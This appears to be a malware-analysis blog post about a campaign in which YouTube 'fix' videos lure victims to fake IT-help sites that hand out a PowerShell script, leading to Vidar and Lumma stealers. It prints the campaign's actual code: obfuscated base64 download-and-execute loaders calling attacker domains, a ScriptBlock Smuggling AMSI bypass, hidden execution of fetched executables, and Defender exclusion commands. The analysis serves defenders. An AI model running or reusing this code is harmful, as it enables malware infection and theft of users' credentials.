20.06.2024
Ongoing series: #1 #2 #3 #4 #5 #6
youtube pc help
This journey began with a tweet by RussianPanda πΌ πΊπ¦ and the related article at esentire, where an incident started with the victim receiving a Windows Update Error Code. They came across a video on YouTube that supposedly solved the problem and were lured to an IT support-themed website. When I visited the site the day after, the first stage and the subsequent payloads had changed, which is the basis for the following analysis.
The Video(s)
In addition to the linked YouTube video from the Tweet, there are several other channels and videos with different thumbnails and content, all similarly structured, all linking to (multiple) supposed help site in the video description. In some cases, tinyurl was used in the video descriptions to obscure the link’s destination or to quickly change the link without having to update the video’s description in case of a domain report. This has already happened multiple times, as evidenced by the videos showing different URLs for the sites. Additionally, the subsequent pages contain references to other previously used URLs to distribute the malware.
| YouTube Link | Upload | Link in Description | Channel |
|-----------------------------------|------------|------------------------------------|-------------------|
| youtube[.]com/watch?v=PIQMXxhiv5A | 2024-05-10 | pchelprwizardsguide[.]com/Guide/ | @mrjparsons |
| youtube[.]com/watch?v=F8Bqe0QvVRY | 2024-05-10 | pchelprwizardsguide[.]com/Guide/ | @Fhaton |
| youtube[.]com/watch?v=gdH41agTRSE | 2024-05-14 | ontrendyt.com/2024/05/ | @OnTrendd |
| youtube[.]com/watch?v=_7u6QlUXYic | 2024-05-15 | pchelperspro[.]com/support/ | @jappaband |
| youtube[.]com/watch?v=WhdDcFQESiI | 2024-05-28 | pchelprwizzards[.]com/0x80070643/ | @imevil924 |
| youtube[.]com/watch?v=uBBMaL4lPlI | 2024-05-28 | pchelperspro[.]com/support/ | @Skoota18 |
| youtube[.]com/watch?v=9gEx90nuWtk | 2024-05-29 | base64 encoded CODE | @hocdehanh |
| youtube[.]com/watch?v=N3TzgqKA9bI | 2024-06-08 | pchelperspro[.]com/support/ | @olcaval |
| youtube[.]com/watch?v=qC622Kj7M1U | 2024-06-08 | repairtechforumpro[.]com/support/? | @olcaval |
| youtube[.]com/watch?v=y0_qWuNPEZw | 2024-06-09 | pchelperspro[.]com/support/ | @smpn4ponorogo773 |
| youtube[.]com/watch?v=6eSPQ0GR9tU | 2024-06-09 | repairtechforumpro[.]com/support/? | @smpn4ponorogo773 |
| youtube[.]com/watch?v=zRNxIzbgdcw | 2024-06-09 | pchelperspro[.]com/support/ | @ahmad____jo.1 |
| youtube[.]com/watch?v=9UpMYvOpfjc | 2024-06-09 | repairtechforumpro[.]com/support/? | @ahmad____jo.1 |
| youtube[.]com/watch?v=TA4yFmMvD0M | 2024-06-09 | pchelperspro[.]com/support/ | @pptqahda_po |
| youtube[.]com/watch?v=B9wJSoaAEHM | 2024-06-09 | repairtechforumpro[.]com/support/? | @pptqahda_po |
| youtube[.]com/watch?v=hmaj2cVr-Gc | 2024-06-09 | pchelperspro[.]com/support/ | @jappaband |
| youtube[.]com/watch?v=l6Tk8qD7ey8 | 2024-06-09 | pchelperspro[.]com/support/ | @jappaband |
| youtube[.]com/watch?v=NC84hYecc0c | 2024-06-09 | pchelperspro[.]com/support/ | @her_idza |
| youtube[.]com/watch?v=GAkblNCc3E8 | 2024-06-09 | repairtechforumpro[.]com/support/? | @her_idza |
| youtube[.]com/watch?v=W6ylM2K7SOM | 2024-06-09 | repairtechforumpro[.]com/support/? | @jappaband |
| youtube[.]com/watch?v=u88XPbJPdNo | 2024-06-09 | repairtechforumpro[.]com/support/? | @jappaband |
| youtube[.]com/watch?v=O1Au_TuJ5X4 | 2024-06-11 | pchelperspro[.]com/support/ | @jappaband |
The PC Help Site(s)
All the sites used are hosted on CloudFlare. The TLS certificates of the websites show different creation dates, suggesting that new domains were created at these times to replace already blocked domains or to be prepared for future blocks. After the domains were nuked by the registrar, the link descriptions were updated to new domains, which are included in the following list.
| PC Help Site | Cert Created |
|---------------------------|--------------|
| pchelprwizardsguide[.]com | 2024-05-31 |
| repairtechforumpro[.]com | 2024-05-31 |
| pchelperspro[.]com | 2024-06-08 |
| pchelperspros[.]com | 2024-06-24 |
The design and structure of the site were apparently copied from this help page by IONOS. The faked site itself contains a rudimentary guide to supposedly fix the error. It instructs users to run a PowerShell script with administrative privileges. The code for this script is provided either via clipboard or alternatively as a Dropbox download of a FIX_YT_CODE.ps1 file.
The Code (Stage 1)
0
1
2
3
4
5
6
7
8
9
| ipconfig /flushdns
$DiagnosticsProcess = "U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw==";
$UI = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($DiagnosticsProcess));
Invoke-Expression $UI;
[System.Diagnostics.Process]::Start("powershell", "-NoProfile -ExecutionPolicy Bypass -w 1 -enc `"JABRAFAAIAA9ACAAKAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAIAAnAHQAcABzADoALwAvAGUAeABlAGMAcgBlAHMAbwB1AHIAYwBlAC4AbAAnACwAJwB0AGQALwBLAEIALwBHAFIAJwAsACcAaAB0ACcAKQArACcARQBFAE4AJwApADsAUwBlAHQALQBJAHQAZQBtACAAVgBhAHIAaQBhAGIAbABlADoASgBkACAAJwBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACcAOwBTAGUAdAAtAEkAdABlAG0AIABWAGEAcgBpAGEAYgBsAGUAOgBcAEwANQBBACAAKABbAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAXQA6ADoATgBlAHcAKAApACkAOwBTAGUAdAAtAEkAdABlAG0AIABWAGEAcgBpAGEAYgBsAGUAOgByAEEAIAAoACgAKAAoAEcAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAATAA1AEEAKQAuAFYAYQBsAHUAZQB8AEcAZQB0AC0ATQBlAG0AYgBlAHIAKQB8AFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0AHsAKABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAVgBhAHIAaQBhAGIAbABlADoAXABfACkALgBWAGEAbAB1AGUALgBOAGEAbQBlAC0AbABpAGsAZQAnACoAUgBlAGEAZAAnAH0AKQAuAE4AYQBtAGUAKQA7AFMAZQB0AC0ASQB0AGUAbQAgAFYAYQByAGkAYQBiAGwAZQA6AFwATAA1AEEAIAAoAEcAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAATAA1AEEAKQAuAFYAYQBsAHUAZQAuACgAKABHAGUAdAAtAEkAdABlAG0AIABWAGEAcgBpAGEAYgBsAGUAOgAvAHIAQQApAC4AVgBhAGwAdQBlACkAKAAoAEcAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAAUQBQACAALQBWAGEAbAB1AGUATwBuAGwAeQApACkAOwAkAEgAdQA9ACcAJwA7AFQAcgB5AHsAVwBoAGkAbABlACgAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEgAdQApAC4AVgBhAGwAdQBlACsAPQBbAEMAaABhAHIAXQAoAEcAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAATAA1AEEAKQAuAFYAYQBsAHUAZQAuAFIAZQBhAGQAQgB5AHQAZQAoACkAKQB7AH0AfQBDAGEAdABjAGgAewB9ADsAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEgAdQApAC4AVgBhAGwAdQBlAHwAJgAoAEcAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAARQAqAHgAdAApAC4AVgBhAGwAdQBlAC4ASQBuAHYAbwBrAGUAQwBvAG0AbQBhAG4AZAAuAEcAZQB0AEMAbQBkAGwAZQB0ACgAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEUAKgB4AHQAKQAuAFYAYQBsAHUAZQAuAEkAbgB2AG8AawBlAEMAbwBtAG0AYQBuAGQALgAoACgAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEUAKgB4AHQAKQAuAFYAYQBsAHUAZQAuAEkAbgB2AG8AawBlAEMAbwBtAG0AYQBuAGQAfABHAGUAdAAtAE0AZQBtAGIAZQByAHwAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAewAoAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIABWAGEAcgBpAGEAYgBsAGUAOgBcAF8AKQAuAFYAYQBsAHUAZQAuAE4AYQBtAGUALQBsAGkAawBlACcAKgBDAG8AbQAqAGUAJwB9ACkALgBOAGEAbQBlACkAKAAnACoAZQAtAEUAeAAqACcALAAkAFQAUgBVAEUALAAkAFQAUgBVAEUAKQApAA==`"") | Out-Null;
exit;
1
|
This script does two things:
- The Base64 encoded variable
$DiagnosticsProcess contains the command Set-Clipboard -Value " "; which is then executed via Invoke-Expression to clear the clipboard and cover any tracks. - The longer base64 encoded block is also executed, but in a separate PowerShell subprocess with
-ExecutionPolicy Bypass to set the session policy and -w 1 to hide the window. When decoded, it results in the following PowerShell script which is somewhat obfuscated:
0
1
2
3
4
5
6
7
8
9
10
11
| $QP = (("{2}{0}{1}"-f 'tps://execresource.l','td/KB/GR','ht')+'EEN');
Set-Item Variable:Jd 'Net.WebClient';
Set-Item Variable:\L5A ([Net.WebClient]::New());
Set-Item Variable:rA ((((Get-Variable L5A).Value|Get-Member)|Where-Object{(Get-ChildItem Variable:\_).Value.Name-like'*Read'}).Name);
Set-Item Variable:\L5A (Get-Variable L5A).Value.((Get-Item Variable:/rA).Value)((Get-Variable QP -ValueOnly));
$Hu='';
Try{
While((Get-Variable Hu).Value+=[Char](Get-Variable L5A).Value.ReadByte()){
}
}
Catch{};
(Get-Variable Hu).Value|&(Get-Variable E*xt).Value.InvokeCommand.GetCmdlet((Get-Variable E*xt).Value.InvokeCommand.(((Get-Variable E*xt).Value.InvokeCommand|Get-Member|Where-Object{(Get-ChildItem Variable:\_).Value.Name-like'*Com*e'}).Name)('*e-Ex*',$TRUE,$TRUE))
|
This script also does two things, with some obfuscation added. Essentially, it downloads a file from another domain on CloudFlare (https://execresource[.]ltd/KG/GREEN) utilizing Net.WebClient and its OpenRead method. The download is another PowerShell script, which is executed by the obfuscated Invoke-Expression statement in line 11.
The Code (Stage 2)
The downloaded and executed script, according to VirusTotal (0/64), is completely harmless. This is because it utilizes a new technique of AMSI bypass, labeled ScriptBlock Smuggling, which was published just 3 days earlier by @_Hubbl3 and @Cx01N_ on the blog of BCSecurity. This technique exploits the fact that all PowerShell security features rely on the correctness of the AST. However, this correctness is not guaranteed because the AST can be manually (and maliciously) constructed using [System.Management.Automation.Language.ScriptBlockAst]::new.
The script introduces a function Get-x6Tm3x that reads temperature information and returns it in Celsius and Fahrenheit, or, if no such information can be retrieved, terminates the execution. This is a form of sandbox evasion, ensuring that the script does not execute if it runs in a sandbox environment that does not provide temperature information.
0
1
2
3
4
5
6
7
8
9
10
11
| function Get-x6Tm3x {
$t = Get-WmiObject Win32_PerfFormattedData_Counters_ThermalZoneInformation -Namespace "root\CIMV2"
if ($t -ne $null) {
foreach ($i in $t) {
$c = $i.Temperature / 10.0
$f = ($c * 9 / 5) + 32
return ("{0:F2} C : {1:F2} F" -f $c, $f)
}
} else {
[Environment]::Exit(1)
}
}
|
The more interesting part begins at line 17, where the pattern from the example ScriptBlockSmuggling.ps1 is implemented, but with malicious intent. The variable $x2fM3d creates a ScriptBlock that supposedly executes ("G"+"et-"+"Da"+"te"). But the variable $w9eR1a is also initialized with a large block of base64 encoded data. This block is then decoded and loaded into the part of the AST that is executed but not logged, and then executed.
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
| $x2fM3d = [ScriptBlock]::Create(("G"+"et-"+"Da"+"te"))
$w9eR1a = ("QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwADsACgAKAEYAdQBuAGMAdABpAG8AbgAgAEMAbwBuAHYAZQByAHQALQBGAHIAbwBtAFMAdAByAGkAbgBnAFQAbwBCAHkAdABlAHMAIAB7AAoAIAAgACAAIABQAGEAcgBhAG0AIAAoAFsAcwB0AHIAaQBuAGcAXQAkAGQAYQB0AGEAKQAKACAAIAAgACAAJABiAHkAdABlAHMAIAA9ACAAJABkAGEAdABhAC4AUwBwAGwAaQB0ACgAJwAtACcAKQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABfACwAIAAxADYAKQAgAH0ACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABiAHkAdABlAHMACgB9AAoACgBGAHUAbgBjAHQAaQBvAG4AIABEAGUAYwByAHkAcAB0AC0AWABPAFIAIAB7AAoAIAAgACAAIABQAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAGQAYQB0AGEALAAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AJABrAGUAeQAKACAAIAAgACAAKQAKACAAIAAgACAAJABrAGUAeQBCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJABrAGUAeQApAAoAIAAgACAAIAAkAGQAZQBjAG8AZABlAGQARABhAHQAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGQAYQB0AGEALgBMAGUAbgBnAHQAaAAKACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAZABhAHQAYQAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAZABlAGMAbwBkAGUAZABEAGEAdABhAFsAJABpAF0AIAA9ACAAJABkAGEAdABhAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AEIAeQB0AGUAcwBbACQAaQAgACUAIAAkAGsAZQB5AEIAeQB0AGUAcwAuAEwAZQBuAGcAdABoAF0ACgAgACAAIAAgAH0ACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABkAGUAYwBvAGQAZQBkAEQAYQB0AGEACgB9AAoACgAkAGgAdAB0AHAAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAC4ASAB0AHQAcABDAGwAaQBlAG4AdAA7AAoAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAZQBjAHIAZQBzAG8AdQByAGMAZQAuAGwAdABkAC8ASwBCAC8AZQBuAGMAJwA7AAoAJABwAGEAdABoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFQAZQBtAHAAUABhAHQAaAAoACkAIAArACAAJwB0AGkAYgBfAG0AbwB1AG4AdABlAHIAXwBzAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwA7AAoAJAB0AGEAcwBrACAAPQAgACQAaAB0AHQAcABDAGwAaQBlAG4AdAAuAEcAZQB0AEIAeQB0AGUAQQByAHIAYQB5AEEAcwB5AG4AYwAoACQAdQByAGwAKQA7AAoAJAB0AGEAcwBrAC4AVwBhAGkAdAAoACkAOwAKAAoAJABrAGUAeQAgAD0AIAAiAFQAVQBaAFgAZwBNAGoAUgBhAGEAZQBuADYAZwBWAEUASABHAGQAdABjADgAWgBwAGYAZgA2AGQAVgA1AE0ANwAiAAoAJABkAGUAYwByAHkAcAB0AGUAZABEAGEAdABhACAAPQAgAEQAZQBjAHIAeQBwAHQALQBYAE8AUgAgAC0AZABhAHQAYQAgACQAdABhAHMAawAuAFIAZQBzAHUAbAB0ACAALQBrAGUAeQAgACQAawBlAHkACgAKAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgALAAgACQAZABlAGMAcgB5AHAAdABlAGQARABhAHQAYQApADsACgAkAHAAcgBvAGMAZQBzAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwA7AAoAJABwAHIAbwBjAGUAcwBzAC4AUwB0AGEAcgB0AEkAbgBmAG8ALgBGAGkAbABlAE4AYQBtAGUAIAA9ACAAJABwAGEAdABoADsACgAkAHAAcgBvAGMAZQBzAHMALgBTAHQAYQByAHQASQBuAGYAbwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACAAPQAgACQAZgBhAGwAcwBlADsACgAkAHAAcgBvAGMAZQBzAHMALgBTAHQAYQByAHQASQBuAGYAbwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAXQA6ADoASABpAGQAZABlAG4AOwAKACQAcAByAG8AYwBlAHMAcwAuAFMAdABhAHIAdAAoACkAOwA=")
$y6uL4q = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($w9eR1a))
$k3mV5x = [ScriptBlock]::Create($y6uL4q)
$j4bN2t = $x2fM3d.Ast
$z7qX1w = $k3mV5x.Ast
$h9gP3d = $j4bN2t.Copy()
$v2mL4k = $z7qX1w.EndBlock.Copy()
$s1dR6j = [System.Management.Automation.Language.ScriptBlockAst]::new(
$h9gP3d.Extent,
$null,
$null,
$null,
$v2mL4k,
$null
)
$r3gY2aBlock = $s1dR6j.GetScriptBlock()
$r3gY2aBlock.Invoke() | Out-String
|
The code relevant to the further progression of the infection is in the base64 encoded block. This block contains additional PowerShell code. It introduces two more functions, Convert-FromStringToBytes and Decrypt-XOR, which are used later. Essentially, it downloads another stage from the already known domain. This stage is XOR encrypted, with the decryption key embedded in the script as TUZXgMjRaaen6gVEHGdtc8Zpff6dV5M7. It then writes this file to the system’s TempPath with the filename tib_mounter_service.exe and executes it, again hiding its window.
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| $httpClient = New-Object System.Net.Http.HttpClient;
$url = 'https://execresource.ltd/KB/enc';
$path = [System.IO.Path]::GetTempPath() + 'tib_mounter_service.exe';
$task = $httpClient.GetByteArrayAsync($url);
$task.Wait();
$key = "TUZXgMjRaaen6gVEHGdtc8Zpff6dV5M7"
$decryptedData = Decrypt-XOR -data $task.Result -key $key
[System.IO.File]::WriteAllBytes($path, $decryptedData);
$process = New-Object System.Diagnostics.Process;
$process.StartInfo.FileName = $path;
$process.StartInfo.UseShellExecute = $false;
$process.StartInfo.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden;
$process.Start();
|
Update
The Stage 2 payload was changed during the day. In the second version, ScriptBlock Smuggling was still used, but the payload in the base64 encoded block was modified. Instead of simply downloading and decrypting via XOR, an additional ScriptBlock was added, which is AES-128-CBC encrypted and can be decrypted using the additionally provided function B.
28
29
30
31
32
| $k = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("SjVQRWI2WEpmbXlLVXF2Nw=="))
$v = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("OWUzMGNhNGU1YTBjN2I1ZWIyMDRkOTZhNGMxOGNiMmU="))
$E = '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'
$D = B - e $E - k $k - v $v
IEX $D;
|
This encrypted code block includes additional measures to prevent analysis. For example, a random sleep is executed multiple times, lasting at least 3 seconds thanks to Get-Random -Minimum 3100 -Maximum 5100. Then, another stage is downloaded, which is an archive. This archive is saved with a random filename and the .zip extension in the TempPath, then extracted to ApplicationData (\AppData\Roaming). The extracted .exe file, among others in the archive, is then executed. This payload is also different from the previous one, more details on this in the update to the next section.
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| $client = New-Object System.Net.Http.HttpClient;
$url = 'https://execresource.ltd/KB/ENC';
$zipName = [System.IO.Path]::GetRandomFileName() + ".zip";
$zipPath = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), $zipName);
$task = $client.GetByteArrayAsync($url);
$task.Wait();
[System.IO.File]::WriteAllBytes($zipPath, $task.Result);
$appDir = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('ApplicationData'), [System.IO.Path]::GetRandomFileName());
[System.IO.Directory]::CreateDirectory($appDir);
Start-Sleep -Milliseconds $rnd
[System.IO.Compression.ZipFile]::ExtractToDirectory($zipPath, $appDir);
Start-Sleep -Milliseconds $rnd
$exe = Get-ChildItem -Path $appDir -Filter *.exe -Recurse | Select-Object -First 1
if ($exe -ne $null) {
$proc = New-Object System.Diagnostics.Process;
$proc.StartInfo.FileName = $exe.FullName;
$proc.StartInfo.UseShellExecute = $false;
$proc.StartInfo.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden;
$proc.Start();
}
|
Update #2
On revisit the GREEN Stage changed again (2024-06-22 08:55). While the base64 encoded block is still the same, the script was changed, and some functionality to add 2 folders (AppData and ProgramData) to the exclusion list for defender was added.
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
| Add-MpPreference -ExclusionPath "$env:USERPROFILE\AppData"
Add-MpPreference -ExclusionPath "C:\ProgramData"
function FxC {
param (
[string]$p
)
$x = Get-MpPreference | Select-Object -ExpandProperty ExclusionPath
return $x -contains $p
}
$z1 = "$env:USERPROFILE\AppData"
$z2 = "C:\ProgramData"
do {
Start-Sleep -Seconds 1
} until ((FxC -p $z1) -and (FxC -p $z2))
|
The Executable
The decrypted download from Stage 2 is an executable with the original filename Intel-SA-00086-CLI.exe. It also presents itself with a matching (non-verifiable) signature dated 2018-08-01 10:39:00 UTC. Based on its behavior and the domains it contacts, it appears to be a Vidar Stealer.
Update
After changing the Stage 2 payload, the final executable was also replaced. The new variant contains multiple files. The executed .exe file is a legitimate version of the Plugin Container for Firefox, signed by the Mozilla Foundation. However, the additionally provided mozglue.dll is flagged as malicious according to VirusTotal and categorized as Lumma Stealer. The signature of this file cannot be verified, indicating a possible manipulation of the DLL. Therefore, I compared the original version 120.0.1 of the file (MD5: bf53388280d2d166f35a7681a330fe7b, with a valid signature) against the delivered file (MD5: c0bc67fed91a77b9b3049b8ecf8155ed, with an unverifiable signature). A simple diff would show an added functionality to load the touchstone.ini and the yate.asp which both are not part of the original behaviour.
< 000b59c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
---
> 000b59c0 00 00 52 65 61 64 46 69 6c 65 00 00 00 00 00 00 |..ReadFile......|
46515,46516c46515,46516
< 000b5de0 00 00 00 00 00 00 00 00 b9 a9 0b 80 01 00 00 00 |................|
< 000b5df0 01 00 00 00 00 00 00 00 b9 a9 0b 80 01 00 00 00 |................|
---
> 000b5de0 00 00 00 00 00 00 00 00 b9 a9 0b 80 01 74 6f 75 |.............tou|
> 000b5df0 63 68 73 74 6f 6e 65 2e 69 6e 69 00 01 00 00 00 |chstone.ini.....|
46703,46704c46703,46704
< 000b69a0 04 00 00 00 00 00 00 00 b4 af 0b 80 01 00 00 00 |................|
< 000b69b0 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 |................|
---
> 000b69a0 04 00 00 00 00 00 00 00 b4 af 0b 80 01 79 61 74 |.............yat|
> 000b69b0 65 2e 61 73 70 00 ff ff 00 00 00 00 00 00 00 00 |e.asp...........|
46764c46764
< 000b6d70 19 00 06 00 02 00 11 00 20 00 00 00 00 00 00 00 |........ .......|
---
> 000b6d70 45 78 69 74 50 72 6f 63 65 73 73 00 00 00 00 00 |ExitProcess.....|
These two files, contained in the delivered ENC.zip folder, consist of encrypted content.
Update #2
Just like the GREEN payload changed, the ENC did change too (2024-06-22 09:21). The new archive contains of multiple (legit) files and the ImPackr.exe executable which is called. According to VirusTotal some of the dll files have malicious behaviour. According to a Tweet by CyberRaiju this is the same final payload used in a ClearFake campaign, which consists of “thousands of compromised #WordPress websites”.
Further research
I found another version (uploaded 2024-05-29 by @hocdehanh) where the code to execute was directly provided in the video description for copying. However, the base64 encoded part differs significantly from the other samples:
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| function Invoke - ObfuscatedPostRequest {
$u = @('https', '://ghufal.answermedia.site', '/KB/po', 'st.php');
$h = @ {
('User' + '-Agent') = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/23.0.0.0 Safari/537.36'
};
$b = @ {
source_id = 'YOUTUBE'
};
$j = $b|ConvertTo - Json;
try {
Invoke - RestMethod - Uri ([String]::Join('', $u)) - Method Post - Body $j - ContentType 'application/json' - Headers $h
} catch {}
}
function Invoke - ObfuscatedCode {
$u = @('https', '://ghufal.answermedia.site', '/KB/CO', 'DD');
$url = [String]::Join('', $u);
$j3L2 = @ {
('User' + '-Agent') = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/23.0.0.0 Safari/537.36'
};
$t9V8 = Invoke - WebRequest - Uri $url - UseBasicParsing - Headers $j3L2;
$k7P4 = [System.Text.Encoding]::UTF8.GetString($t9V8.Content);
$i5L6 = Invoke - Expression $k7P4;
$null = $i5L6;
Clear - Host
}
Invoke - ObfuscatedPostRequest;
